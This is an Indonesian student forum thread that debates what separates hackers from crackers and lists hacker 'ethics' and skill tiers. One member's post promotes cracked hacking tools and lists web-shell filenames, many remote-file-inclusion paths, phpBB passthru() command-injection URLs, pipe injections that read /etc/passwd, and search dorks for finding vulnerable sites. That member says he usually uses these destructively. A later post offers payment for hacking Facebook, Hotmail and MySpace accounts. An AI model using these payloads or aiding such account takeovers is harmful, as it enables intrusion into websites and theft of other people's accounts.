Referensi Hacker

Halaman 2 dari 2 Previous  1, 2

Topik sebelumnya Topik selanjutnya Go down

Re: Referensi Hacker

Post by OceaNLorD on Tue Oct 02, 2007 7:06 am

ck ck ck...

tolong jangan memperburuk nama hacker !!!
bisa gak bedain hacker,script kiddies,dan cracker?
-Hacker : -Seseorang yang membantu membangun internet dan punya banyak ide.
-pandai, dan sangat tertarik dalam pengembangan teknologi.

Script Kiddies : kayak lo itu la!yang mengandalkan tool buatan orang lain!!!

Cracker : 180 dari definisi hacker,tidak peduli pada perkembangan teknologi,karena kalo makin canggih teknologi makin susah ntar kerjanya...

JADI JANGAN ANGGAP DIRI ANDA HACKER!!!!!!!!
HACKER ITU BUKAN PEKERJAAN YANG BIKIN ORANG SUSAH,PANIK,DAN STRESS!!!!!!!!!!

~EDITED FOR BAD WORD~ LORD MIST
avatar
OceaNLorD
Siswa Baru
Siswa Baru

Male
Jumlah posting : 24
Age : 27
Lokasi : whErE i Wanna be...
Pekerjaan : Freedom Chaser...!!err... i mean student...
Reputasi : 0
Registration date : 02.10.07

Lihat profil user

Kembali Ke Atas Go down

Re: Referensi Hacker

Post by Lord Mist on Tue Oct 02, 2007 5:00 pm

Hacking sendiri harus belajar, jadi harus belajar lewat aplikasi. Referensi sendiri harus dapat dipercaya, pada dasarnya hacking harus tahu soal jaringan, server dan bahasa pemograman yang digunakan.

Tool tool hacking yang saya gunakan itu hanya tool tool sebagai pengenalan, karena hacking sendiri bukanlah demikian, hacking punya pengertian yang jauh lebih luas daripada sekedar Jebol CC, Password Recovery, "Remote" Control dll.

Cracking, memang berbeda dengan Hacking, Crack sendiri berarti membuat suatu ekstensi file agar dapat dijalankan secara ilegal.

Jika anda ingin mengkritik cara saya bekerja, tolong jangan gunakan kata kata ofensif yang baru saya edit. Saya punya referensi yang lebih dari ini, dan bukan hanya alat hacking untuk coba coba saja.

Jika anda masih bingung, silahkan ikuti link post saya sebelumnya.


Lord Mist wrote:Ini tempat downloadnya....

Code:
http://www.esnips.com/web/ultimatehackingtools

Ni situs emang kudu bayar, tapi temen seperjuangan ane berhasil nge crack ni beberapa aplikasinya....

Code:
http://www.crackfind.com/vhirus_destroyer/%20

Selamat hacking.....!

Disana akan tertulis LEARNING TOOLS, dan bukan auto hacking (atau yang anda tulis sebagai script kiddies).

Oh, dan saya belum menyebut saya sebagai seorang hacker yang ahli, karena saya sendiri masih dalam proses belajar, namun asal ada dasar seseorang dapat disebut hacker sebobrok apapun pengetahuannya. Ada pun bagi mereka yang non-script kiddies yang mau hacking tanpa mempelajari alat bantunya bisa buka disini:

Code:
www.boleh-hacking.com

Kalau anda memang benar benar hacker....

Code:

Ajan.asp
Asmodeus v0.1.pl
backup.php
backupsql.php
Blind Shell.cpp
c2007.php
c99.php
c99shell.php
Casus15.php
cgi-python.py
CMD.asp
CmdAsp.asp
connectback2.pl
ctt_sh.php
CyberEye.asp
cybershell.php
CyberSpy5.Asp
Dx.php
DxShell_hk.php
EFSO_2.asp
Elmali Seker.asp
elmaliseker.asp
gfs_sh.php
img.php
iMHaPFtp.php
Inderxer.asp
indexer.asp
Java Shell.js
Klasvayv.asp
load_shell.php
lurm_safemod_on.cgi
mailer3.php
mysql.php
mysql_tool.php
network.php
Nshell (1).php
nshell.php
nstview.php
NT Addy.asp
ntdaddy.asp
perlbot.pl
PH Vayv.php
PHP Backdoor Connect.pl
PHP Shell.php
pHpINJ.php
phpshell.php
phvayv.php
Phyton Shell.py
pws.php
r57 Shell.php
r57pws.pl
r57shell.php
Rader.asp
reader.asp
Rem Exp.asp
Rem View.php
RemExp.asp
remview.php
ru24_post_sh.php
Russian.php
s.php
Server Variables.asp
Sincap.php
smtpd.py
telnet.cgi
telnet.pl
telnetd.pl
Test.php
Tool.asp
Uploader.php
WebShell.cgi
xinfo.php
zacosmall.php
zehir4.asp
Diatas itu nama nama (jenis dari ap apa???)

Berikutnya:


Code:


/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

/includes/header.php?systempath=

/Gallery/displayCategory.php?basepath=

/index.inc.php?PATH_Includes=

/nphp/nphpd.php?nphp_config[LangFile]=

/include/db.php?GLOBALS[rootdp]=

/ashnews.php?pathtoashnews=

/ashheadlines.php?pathtoashnews=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/demo/includes/init.php?user_inc=

/jaf/index.php?show=

/inc/shows.inc.php?cutepath=

/poll/admin/common.inc.php?base_path=

/pollvote/pollvote.php?pollname=

/sources/post.php?fil_config=

/modules/My_eGallery/public/displayCategory.php?basepath=

/bb_lib/checkdb.inc.php?libpach=

/include/livre_include.php?no_connect=lol&chem_absolu=

/index.php?from_market=Y&pageurl=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/pivot/modules/module_db.php?pivot_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/derniers_commentaires.php?rep=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

/coppermine/themes/maze/theme.php?THEME_DIR=

/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/main.php?page=

/default.php?page=

/index.php?action=

/index1.php?p=

/index2.php?x=

/index2.php?content=

/index.php?conteudo=

/index.php?cat=

/include/new-visitor.inc.php?lvc_include_dir=

/modules/agendax/addevent.inc.php?agendax_path=

/shoutbox/expanded.php?conf=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/pivot/modules/module_db.php?pivot_path=

/library/editor/editor.php?root=

/library/lib.php?root=

/e107/e107_handlers/secure_img_render.php?p=

/zentrack/index.php?configFile=

/main.php?x=

/becommunity/community/index.php?pageurl=

/GradeMap/index.php?page=

/index4.php?body=

/side/index.php?side=

/main.php?page=

/cgi-bin/diary/sdy.cgi?md=past&tg=200405.dat|uname%20-a|

/es/index.php?action=

/index.php?sec=

/index.php?main=

/index.php?sec=

/index.php?menu=

/html/page.php?page=

/page.php?view=

/index.php?menu=

/main.php?view=

/index.php?page=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/phpBB2/viewtopic.php?t=36&highlight=%2527.passthru($HTTP_ GET_VARS[sh]).%2527&sh=ls%20-al

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/phpBB2/viewtopic.php?t=36&highlight=%2527.passthru($HTTP_ GET_VARS[sh]).%2527&sh=ls%20-al

/forumlinux/viewtopic.php?t=29%20&highlight=%2527&highlight=%2 527.passthru($HTTP_GET_VARS[CMD]).%2527&CMD=ls%20-al;

/index.php?show=

/tutorials/print.php?page=

/index.php?page=

/index.php?level=

/index.php?file=

/index.php?inter_url=

/index.php?page=

/index2.php?menu=

/index.php?level=

/index1.php?main=

/index1.php?nav=

/index1.php?link=

/index2.php?page=

/index.php?myContent=

/index.php?TWC=

/index.php?sec=

/index1.php?main=

/index2.php?page=

/index.php?babInstallPath=

/main.php?body=

/index.php?z=

/main.php?view=

/cgi-bin/site/session.cgi?page=links.html|cat /etc/passwd|

/forums/viewtopic.php?t=4&highlight=%2527.passthru($HTTP_G ET_VARS[a]).%2527&a=dir%20....

/phpBB2/viewtopic.php?t=7&highlight=%2527.passthru($HTTP_G ET_VARS[a]).%2527&a=id;pwd

/forum/viewtopic.php?t=232&highlight=%2527.phpinfo().%252 7

/viewtopic.php?t=1&highlight=%2527.passthru($HTTP_G ET_VARS[a]).%2527&a=id;pwd

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/index.php?file=

/allinurl:/index.php?page= site:*.dk

/allinurl:"pnphpbb2

/inurl:/allmyguest

/allinurl:/index.php?file= site:*.dk

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
Ini cara untuk apa...?

Kalau tidak tahu... anda belum punya hak untuk mengkritik orang lain..... ingat bahwa kita masih dalam proses belajar untuk menjadi hacker sebenarnya, dan juga, saya bukan hanya menge-post TOOL tapi juga INSTRUKSI. Saya juga mohon maaf karena post ini adalah pembenaran atas apa yang telah anda post diatas.

Sebelumnya maaf jika post ini menyinggung anda.
avatar
Lord Mist
Siswa Junior
Siswa Junior

Male
Jumlah posting : 367
Age : 26
Lokasi : 1 & 0 City
Pekerjaan : Cracker Menuju Taubat
Reputasi : 0
Registration date : 28.09.07

Lihat profil user

Kembali Ke Atas Go down

Re: Referensi Hacker

Post by jack1988 on Sat Oct 06, 2007 4:15 pm

okey2.. bwat yang terhormat Lord Mist & Afianto : gue nyoba ngidentifikasi problem yang terjadi, 'n yang gue dapetin yaitu perbedaan persepsi tentang hacker itu sendiri.
oke dech, mudah2an ini kagak OOT.. gue dapetin ini dari banyak site referensi, gue lupa site na (dari manca 'n juga lokal) tapi pengertian ini udah melekat dihati gue yang paling dalem, mengenai perbedaan hacker dan cracker.

Hacker : adalah seseorang yang dengan kemampuan yang dimilikinya ingin memberikan (menciptakan) sesuatu yang bermanfaat bagi masyarakat, dalam case ini masyarakat IT tentunya. sedangkan Cracker adalah orang yang menggunakan (mencuri) keahlian Hacker untuk tujuan yang 180 derajad sebaliknya dan bersifat destruktif (umumnya merugikan). contohnya seperti mem-bypass password atau lisensi sebuah program komputer, Mendeface (merubah halaman muka sebuah web) milik orang lain bahkan menghapus data-data dalam web tersebut. kedua hal tersebut bisa disebut Cracking, meskipun dengan dalih mengingatkan akan kelemahan sistem orang lain. apalagi hal tersebut dilakukan dengan dasar sebagai pembuktian akan kemampuan sesorang.

pengertian hacking lebih condong kepada kegiatan Mencari, Mempelajari, dan Mengubah (dalam tujuan Memperbaiki) kelemahan sebuah sistem dengan tetap mengindahkan legalitas sebuah lisensi. Para Hacker biasanya masuk bahkan menyusup sebuah sistem tanpa perusakan dengan tujuan memuaskan "Diri sendiri" akan sebuah pengetahuan dan Teknik. Kebanyakan perusahaan-perusahaan yang bergerak di dunia jaringan global memiliki staff seorang hacker. Tugasnya adalah untuk melindungi jaringan dari kemungkinan perusakan pihak luar (Cracker) dan menutup Bug-bug sebagai kemungkinan jalan masuk Cracker.

Seperti hal-nya subyek yang lain, kelompok Hacker juga memiliki Hierarki atau tingkatan dalam kemampuan seorang hacker itu sendiri. berikut detail hierarki Hacker :

1. Elite adalah kasta tertinggi dalam dunia hacker. hacker dalam tingkatan ini sudah mengerti dengan baik sebuah sistem operasi (OS) luar maupun dalam. mereka telah sanggup meng-konfigurasi dan menyambungkan jaringan secara global, melakukan pemrograman secara menyeluruh, sangat efisien dan juga high skill, dan yang paling penting adalah mereka selalu menggunakan kemampuan tersebut dengan tepat dan selalu mengikuti peraturan (etika) yang ada. hierarki kelas ini juga sering disebut "Suhu".

2. Semi Elite biasanya lebih muda dari golongan Elite, tetapi sudah memiliki kemampuan dan pengetahuan yang luas tentang komputer, paham tentang sistem operasi beserta celah nya, dan mempunyai kemampuan programming yang cukup untuk mengubah program semacam exploit.

3. Developed Kiddie adalah hacker yang rata-rata berumur belasan dan dua-puluhan tahun. mereka umumnya membaca tentang metode-metode hacking dan cara hacking di berbagai media dan kesempatan, kemudian mencoba beberapa sistem dan kemudian berhasil. Golongan ini biasanya masih menggunakan Grafik User Interface (GUI) dan baru belajar tentang basic dari UNIX tanpa mampu mengetahui celah baru di OS tersebut.

4. Script Kiddie Mirip dengan Developer Kiddie, tetapi lebih cenderun kepada Lamer. mereka hanya memiliki kemampuan networking yang sangat minim, tidak lepas dari GUI, dan sebagian Hacking menggunakan trojan untuk menggertak dan meresahkan pengguna Internet.

5. Lamer adalah orang yang tidak punya pengetahuan tetapi ingin menjadi Hacker, sehingga golongan ini juga biasa di sebut "Wanna be Hacker". Penggunaan komputer mereka hanyalah sebatas maen game, IRC, tukar menukar (sharing) Software prirate dan Crack, mencuri kartu kredit, memakai Trojan, Nuke dan DoS, hoby menyombongkan diri di IRC Channel, dan sebagainya. perkembangan mereka umumnya hanyalah sebatas script kiddie, itupun sebagian kecil.

Script Kiddie dan Lamer lebih tepat di golongkan dalam kelas Cracker. penggolongan di atas beralasan Craker tidak memiliki Hierarki secara khusus karena sifatnya hanya membongkar dan merusak.

Berbeda dengan Cracker, Hacker memiliki kode etik khusus yang di sebut Kode Etik Hacker, yaitu :

1. Mampu mengakses komputer tak terbatas dan totalitas.

2. Semua informasi haruslah FREE.

3. Tidak percaya pada otoritas, artinya memperluas desentralisasi.

4. Tidak memakai identitas palsu, seperti nama samaran yang konyol, umur, posisi, dll.

5. Mampu membuat seni keindahan dalam komputer.

6. Komputer dapat mengubah hidup menjadi lebih baik.

7. Pekerjaan yang di lakukan semata-mata demi kebenaran informasi yang harus disebar luaskan.

8. Memegang teguh komitmen tidak membela dominasi ekonomi industri software tertentu.

9. Hacking adalah senjata mayoritas dalam perang melawan pelanggaran batas teknologi komputer.

10. Baik Hacking maupun Phreaking adalah satu-satunya jalan lain untuk menyebarkan informasi pada massa agar tak gagap dalam komputer.
Cracker tidak memiliki kode etik apapun.

Perbedaan keseluruhan antara Hacker Dan Cracker adalah sebagai berikut :
#hacker

1.Mempunyai kemampuan menganalisa kelemahan suatu sistem atau situs. Sebagai contoh : jika seorang hacker mencoba menguji situs Yahoo! dipastikan isi situs tersebut tak akan berantakan dan mengganggu yang lain. Biasanya hacker melaporkan kejadian ini untuk diperbaiki menjadi sempurna.

2.Hacker mempunyai etika serta kreatif dalam merancang suatu program yang berguna bagi siapa saja.

3. Seorang Hacker tidak pelit membagi ilmunya kepada orang-orang yang serius atas nama ilmu pengetahuan dan kebaikan.

#cracker

1. Mampu membuat suatu program bagi kepentingan dirinya sendiri dan bersifat destruktif atau merusak dan menjadikannya suatu keuntungan. Sebagia contoh : Virus, Pencurian Kartu Kredit, Kode Warez, Pembobolan Rekening Bank, Pencurian Password E-mail/Web Server.

2. Bisa berdiri sendiri atau berkelompok dalam bertindak.

3. Mempunyai situs atau cenel dalam IRC yang tersembunyi, hanya orang-orang tertentu yang bisa mengaksesnya.

4. Mempunyai IP yang tidak bisa dilacak.

5. Kasus yang paling sering ialah Carding yaitu Pencurian Kartu Kredit, kemudian pembobolan situs dan mengubah segala isinya menjadi berantakan.

tulisan di atas sebelum na pernah gue post di sini

demikian, gue harap bisa nge-bantu permasalahan anda berdua.
bwat Lord Mist, gue mohon maaf but gue harus bilang, gimanapun dilihat dari aktifitas loe di global network, loe termasuk golongan cracker. tapi gue akuin loe cracker yang hebat.
avatar
jack1988
Siswa Junior
Siswa Junior

Male
Jumlah posting : 125
Age : 29
Lokasi : FIRE_place
Pekerjaan : NETworking
Reputasi : 0
Registration date : 14.09.07

Lihat profil user http://www.zonehacking.usersboard.com

Kembali Ke Atas Go down

Re: Referensi Hacker

Post by jack1988 on Sat Oct 06, 2007 4:36 pm

oiya gue nyoba jawab code yang di kasih Mod :
ekstensi asp, php, js merupakan indikasi script language yang di pakai oleh suatu page di sebuah site. pengetahuan ini dimanfaatkan seorang cracker khusus na lamer untuk menentukan exploit yang harus dijalankan untuk menginject page tersebut.
sedangkan cgi, py, 'n pl adalah extensi suatu komponen dalam directory website. cracker biasa memanfaatkan file ini (pada website yang tidak di patch oleh sang admin) untuk mengorek info tentang Cpanel atopun MySQL server administrator.

untuk code yang kedua.. smua itu adalah kumpulan dari script dasar exploit untuk directory injections. semua query yang mendukung exploit tersebut ada di di MySQL server. untuk SQL yang tidak terpatch, query tersebut working kalo menemui kecocokan. tapi untuk admin yang jago biasa na menyertakan patch yang disebut dengan cookie. 'n juga admin yang baek selalu mengaktifkan case sensitif pada MySQL server na. dengan dua hal tersebut, exploit2 di atas mati total.
kembali gue bilang, bug2 tersebut adalah ilmu yang ajarkan oleh para hacker dengan dasar kode etik kebebasan pengetahuan yang tak terbatas, 'n disalahgunakan oleh cracker & lamer untuk tujuan pribadi (umumnya merusak).
avatar
jack1988
Siswa Junior
Siswa Junior

Male
Jumlah posting : 125
Age : 29
Lokasi : FIRE_place
Pekerjaan : NETworking
Reputasi : 0
Registration date : 14.09.07

Lihat profil user http://www.zonehacking.usersboard.com

Kembali Ke Atas Go down

Re: Referensi Hacker

Post by jack1988 on Sat Oct 06, 2007 4:42 pm

oiya 1 lagi.. tadi Lord Mist nyinggung boleh-hacking.com? emang situ member na? kalo iya username na di BH sapa?
gue tau ini OOT, but kalo bisa dijawab sebelum dihapus, ok!
avatar
jack1988
Siswa Junior
Siswa Junior

Male
Jumlah posting : 125
Age : 29
Lokasi : FIRE_place
Pekerjaan : NETworking
Reputasi : 0
Registration date : 14.09.07

Lihat profil user http://www.zonehacking.usersboard.com

Kembali Ke Atas Go down

Re: Referensi Hacker

Post by Lord Mist on Sat Oct 06, 2007 5:12 pm

jack1988 wrote:oiya 1 lagi.. tadi Lord Mist nyinggung boleh-hacking.com? emang situ member na? kalo iya username na di BH sapa?
gue tau ini OOT, but kalo bisa dijawab sebelum dihapus, ok!

Bukan.... saya hanya menggali ilmu saja dari sana. Kalaupun ada, saya tidak membuat thread tapi langsung mengontak mereka dari e-mail/ponsel mereka.... saya juga sering menguji coba script-script yang mereka sediakan, apakah mereka relevan atau tidak. :)

Ya, saya harus mengakui biasanya saya menggunakan hal ini, untuk tujuan merusak... namun saya tidak pernah melakukannya untuk merugikan orang lain secara materil, alasannya, jelas adalah dosa. Namun saya selalu menjawab apabila seorang bertanya. seperti yang mereka katakan, ilmu kalau tidak pernah dibagi, akan hilang dalam proses waktu Wakakakak .

Hacking sendiri, sebenarnya adalah pisau bermata dua. Menurut hacker yang baik, mereka menanggap bahwa ilmu mereka digunakan untuk tujuan yang baik dalam net, misal, tadi, menguji keamanan suatu web, dll. Namun, apakah hal ini akan sama jika orang yang kebetulan berlawanan menguasai ilmu hacking yang sama dan setara? tentu tidak, mereka tidak akan memberi tahu si provider tadi. Jadi defini seorang hacker adalah perspektif, relatif dan tidak bisa dinilai dari satu sudut saja Sip. Dengan bangga saya dapat mengatakan bahwa anda, termasuk seorang Hacker yang membuat net lebih baik.



Terima kasih atas penjelasan yang anda kirim diatas, juga sesuatu yang anda "link" di sig anda ^^. Saya harus mengakui kalau saya telah keluar dari batas seorang hacker :).

Ok, BTT ^^.
avatar
Lord Mist
Siswa Junior
Siswa Junior

Male
Jumlah posting : 367
Age : 26
Lokasi : 1 & 0 City
Pekerjaan : Cracker Menuju Taubat
Reputasi : 0
Registration date : 28.09.07

Lihat profil user

Kembali Ke Atas Go down

Re: Referensi Hacker

Post by jack1988 on Sat Oct 06, 2007 5:57 pm

gue kira Lord Mist terlalu berlebihan. tapi buat gue, hacker dan cracker punya jalan masing-masing, dan itu adalah hak tiap orang bwat milih. jadi bwat gue, bersaing dalam system is okay! tapi di luar itu, berbagi info tetap mengacu pada kode etik kebebasan ilmu pengetahuan yang tak terbatas.


thanks buat moderator.. sory udah gangguin forum!!
avatar
jack1988
Siswa Junior
Siswa Junior

Male
Jumlah posting : 125
Age : 29
Lokasi : FIRE_place
Pekerjaan : NETworking
Reputasi : 0
Registration date : 14.09.07

Lihat profil user http://www.zonehacking.usersboard.com

Kembali Ke Atas Go down

Re: Referensi Hacker

Post by Dashin on Sat Oct 06, 2007 6:12 pm

Peretas (Inggris: hacker atau cracker)
adalah orang yang mempelajari, menganalisa, dan selanjutnya bila
menginginkan, bisa membuat, memodifikasi, atau bahkan mengeksploitasi
sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya , terutama keamanan.
avatar
Dashin
Siswa Senior
Siswa Senior

Male
Jumlah posting : 721
Age : 36
Lokasi : Mayapada
Pekerjaan : Gamers
Reputasi : 0
Registration date : 25.09.07

Lihat profil user http://www.friendster/humandani

Kembali Ke Atas Go down

Re: Referensi Hacker

Post by Dashin on Sat Oct 06, 2007 6:14 pm

Hacker juga terbagi dalam 2
1.Black Hat Hacker
Adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada peretas
yaitu mereka yang menerobos keamanan sistem komputer tanpa ijin,
umumnya dengan maksud untuk mengakses komputer-komputer yang terkoneksi
ke jaringan tersebut. Istilah cracker diajukan oleh Richard Stallman untuk mengacu kepada peretas dalam arti ini
2.White Hat Hacker
Adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada peretas yang secara etis menunjukkan suatu kelemahan dalam sebuah sistem komputer. White hat secara umum lebih memfokuskan aksinya kepada bagaimana melindungi sebuah sistem, dimana bertentangan dengan black hat yang lebih memfokuskan aksinya kepada bagaimana menerobos sistem tersebut.
avatar
Dashin
Siswa Senior
Siswa Senior

Male
Jumlah posting : 721
Age : 36
Lokasi : Mayapada
Pekerjaan : Gamers
Reputasi : 0
Registration date : 25.09.07

Lihat profil user http://www.friendster/humandani

Kembali Ke Atas Go down

Re: Referensi Hacker

Post by Dashin on Sat Oct 06, 2007 6:18 pm

jack1988 wrote:gue kira Lord Mist terlalu berlebihan. tapi buat gue, hacker dan cracker punya jalan masing-masing, dan itu adalah hak tiap orang bwat milih. jadi bwat gue, bersaing dalam system is okay! tapi di luar itu, berbagi info tetap mengacu pada kode etik kebebasan ilmu pengetahuan yang tak terbatas.


thanks buat moderator.. sory udah gangguin forum!!
Tenang aja, klo masalah perdebatan Mod gak akan hapus. Itung2 buat sharing ilmu. Tapi klo sudah OOT, Spamming, dan sebagainya tak akan diampuni. hahahahaha Nyengir Tenang kita akan mengevaluasi suatu postingan sebelum memberikan sanksi atas perbuatan member yang terkait.
avatar
Dashin
Siswa Senior
Siswa Senior

Male
Jumlah posting : 721
Age : 36
Lokasi : Mayapada
Pekerjaan : Gamers
Reputasi : 0
Registration date : 25.09.07

Lihat profil user http://www.friendster/humandani

Kembali Ke Atas Go down

Re: Referensi Hacker

Post by putu-yoga on Sat Oct 06, 2007 6:29 pm

hacker itu intinya yg baik ngetik
kalau cracker itu intinya yang jahat ngetik

_________________
Ayo kita Majukan FPI (Forum pelajar indonesia)
avatar
putu-yoga
Admin
Admin

Male
Jumlah posting : 839
Age : 24
Lokasi : Sengata
Pekerjaan : Pelajar
Reputasi : 0
Registration date : 13.09.07

Lihat profil user http://putu.co.nr

Kembali Ke Atas Go down

Re: Referensi Hacker

Post by goana77 on Sun Jan 11, 2009 9:25 am

ada yg bisa bantu saya untuk hack facebook, hotmail and myspace ?


contact me goanapet77@yahoo.com

Saya akan kasih imbalan berupa uang, apabial ada yg bisa bantu dengan cara gampang dan aman ( jangan car phising ya)



Thanks,
Petrick
avatar
goana77
Siswa Baru
Siswa Baru

Male
Jumlah posting : 1
Age : 40
Lokasi : jakarta
Reputasi : 0
Registration date : 11.01.09

Lihat profil user

Kembali Ke Atas Go down

Re: Referensi Hacker

Post by Sponsored content


Sponsored content


Kembali Ke Atas Go down

Halaman 2 dari 2 Previous  1, 2

Topik sebelumnya Topik selanjutnya Kembali Ke Atas


 
Permissions in this forum:
Anda tidak dapat menjawab topik